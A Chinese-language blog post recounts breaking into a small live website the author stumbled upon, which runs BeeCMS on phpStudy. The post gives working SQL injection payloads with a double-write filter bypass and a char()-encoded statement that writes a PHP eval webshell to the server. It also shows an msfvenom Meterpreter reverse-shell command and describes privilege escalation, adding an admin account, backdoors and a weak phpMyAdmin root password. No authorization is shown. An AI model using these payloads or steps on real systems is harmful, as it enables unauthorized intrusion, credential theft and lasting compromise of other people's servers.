記錄某一次無意點(diǎn)開的一個(gè)小網(wǎng)站的滲透過程，幸運(yùn)的是搭建平臺(tái)是phpstudy，cms是beecms，beecms有通用漏洞，然后去網(wǎng)上找了資料，成功getshell并獲取服務(wù)器權(quán)限。

一、滲透過程

無意點(diǎn)開一個(gè)網(wǎng)站，發(fā)現(xiàn)網(wǎng)站比較小，且看起來比較老，然后發(fā)現(xiàn)logo沒有改，于是乎去百度搜索這個(gè)cms，發(fā)現(xiàn)有通用漏洞，Beecms 通用漏洞

這里運(yùn)氣比較好，沒有更改后臺(tái)地址，還是默認(rèn)地址/admin/login.php

通過通用漏洞發(fā)先后臺(tái)管理處存在sql注入漏洞，直接輸入admin’，然后就會(huì)報(bào)錯(cuò)，這里用萬能密碼不能登陸，看來還是得通過上面得通用漏洞來進(jìn)行注入

可以看到輸入payload后，頁面返回正常，從而可以判斷有sql注入，這里采用雙寫進(jìn)行繞過

發(fā)現(xiàn)這個(gè)注入點(diǎn)后，就有各種各樣的注入方式了，通過sql語句寫入一句話，sqlmap一把梭，手工注入得到賬號(hào)密碼等等，怎么方便怎么來,這里我把幾種方法都寫一下，看看那種方法可以

方法一

1.通過post抓包sqlmap一把梭，dump出管理員賬號(hào)密碼，進(jìn)后臺(tái)找上傳點(diǎn)

2.一把梭，發(fā)現(xiàn)并沒有，使用腳本也沒有繞過

方法二

1.通過burp抓包，寫入一句話，payload：admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#，發(fā)現(xiàn)寫入失敗，前面講到有防護(hù)，這里通過hex編碼或者char函數(shù)繞過

2.對(duì)shell部分進(jìn)行編碼

3.寫入shell的payload為:注意:記得在編碼轉(zhuǎn)換的時(shí)候前面加0x或者直接用unhex函數(shù),但是本次實(shí)驗(yàn)用unhex函數(shù)一直失敗,所以在前面加0x，看到可以寫入成功。

ps:這里的寫入路徑純屬盲猜，運(yùn)氣好，默認(rèn)目錄

4.用蟻劍連接,成功連接，至此getshell完畢，下來就是后滲透階段，后面會(huì)講

char函數(shù)繞過:mysql內(nèi)置函數(shù)char()可以將里面的ascii碼轉(zhuǎn)換為字符串，payload為:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

一樣成功寫入

1.寫入成功后，菜刀可以連接，我們?cè)L問寫入的文件，驚奇的發(fā)現(xiàn)竟然有admin，和一串md5碼，大膽猜測可能是后臺(tái)賬號(hào)和密碼，試一下

2.md5解密，wocao，成功登陸，然后就是后臺(tái)找上傳了

二、后滲透

通過whoami查看權(quán)限，發(fā)現(xiàn)是admin權(quán)限，但是不是最高權(quán)限，我們要提到最高權(quán)限去

方法一

1.通過msf生成木馬提權(quán)，payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通過蟻劍上傳木馬，并執(zhí)行。執(zhí)行之前打開msf使用模塊use exploit/multi/handler，設(shè)置相應(yīng)參數(shù)，然后開始監(jiān)聽

3.不知道什么問題，用這個(gè)沒有成功，那么只能通過大馬提權(quán)了

方法二

1.上傳大馬，此處應(yīng)該有狗或者盾之類的，用的免殺，成功上傳

2.訪問大馬

3.這里提權(quán)方式很多，就不細(xì)說了,有大馬之后很多操作都可以引刃而解了，開放端口，添加賬號(hào)，留后門。。等等

4.創(chuàng)建admin權(quán)限賬號(hào)之后，登陸服務(wù)器

三、一些其他的發(fā)現(xiàn)

通過掃描目錄，還發(fā)現(xiàn)有phpmyadmin，可以爆破，這里我試了下竟然是弱口令，都是root，但是連接不上，只能通過phpmyadmin登陸，發(fā)現(xiàn)是低版本的phpstudy搭建的，這里就可以另一種思路，利用日志文件寫入一句話getshell

四、總結(jié) 1.前臺(tái)sql注入獲取用戶名密碼，進(jìn)入后臺(tái)找上傳 2.SQL注入語句寫入一句話 3.phpmyadmin一句話getshell 4.上傳大馬提權(quán)

至此，滲透結(jié)束。

審核編輯：劉清